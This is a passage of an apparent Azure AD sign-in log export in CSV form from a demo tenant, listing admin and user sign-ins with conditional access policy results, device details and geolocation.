'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:11,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",e9cfabe1-d666-446f-aeb7-5817453e0e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,e9cfabe1-d666-446f-aeb7-5817453e0e00,SigninLogs,Sucess,41.90428925,-85.99833679
+1294,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:48.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8866f5c2-c0ad-410f-ba98-c2ca8978fa11,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 12:01,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",fbcf3a57-b92a-4bcf-a38d-09fb66d00b00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,fbcf3a57-b92a-4bcf-a38d-09fb66d00b00,SigninLogs,Sucess,50.6406517,5.572050095
+1295,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:50.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,221a3635-e823-42aa-888e-0d7b1378e44a,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 12:01,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",42ec543f-db91-4d87-b07f-74fdc7e80a00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,42ec543f-db91-4d87-b07f-74fdc7e80a00,SigninLogs,Sucess,50.6406517,5.572050095
+1296,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:50.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,49d72ea1-2ef0-4a27-9a59-fcb12a0faca5,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 12:01,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",b125da47-83a8-4791-90e4-983baa2c0a00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,b125da47-83a8-4791-90e4-983baa2c0a00,SigninLogs,Sucess,50.6406517,5.572050095
+1297,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:03.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,42648697-c903-444f-9df1-2c9b47b85a66,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 12:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",178eb907-c36d-4662-9369-da02ef430c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,178eb907-c36d-4662-9369-da02ef430c00,SigninLogs,Sucess,36.6404686,-78.26995087
+1298,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:15.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b8be8a8-ef28-453d-b76d-658753bb1e07,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 12:01,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",65ce963c-c870-4311-8389-19e502c20a00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,65ce963c-c870-4311-8389-19e502c20a00,SigninLogs,Sucess,50.6406517,5.572050095
+1299,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:23.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b8be8a8-ef28-453d-b76d-658753bb1e07,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 12:02,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",8046174b-712f-40d9-9f4e-13cd170b0c00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,8046174b-712f-40d9-9f4e-13cd170b0c00,SigninLogs,Sucess,50.6406517,5.572050095
+1300,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,03:41.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b8be8a8-ef28-453d-b76d-658753bb1e07,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 12:03,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",42ec543f-db91-4d87-b07f-74fd67f40a00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,42ec543f-db91-4d87-b07f-74fd67f40a00,SigninLogs,Sucess,50.6406517,5.572050095
+1301,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,03:37.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b8be8a8-ef28-453d-b76d-658753bb1e07,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': 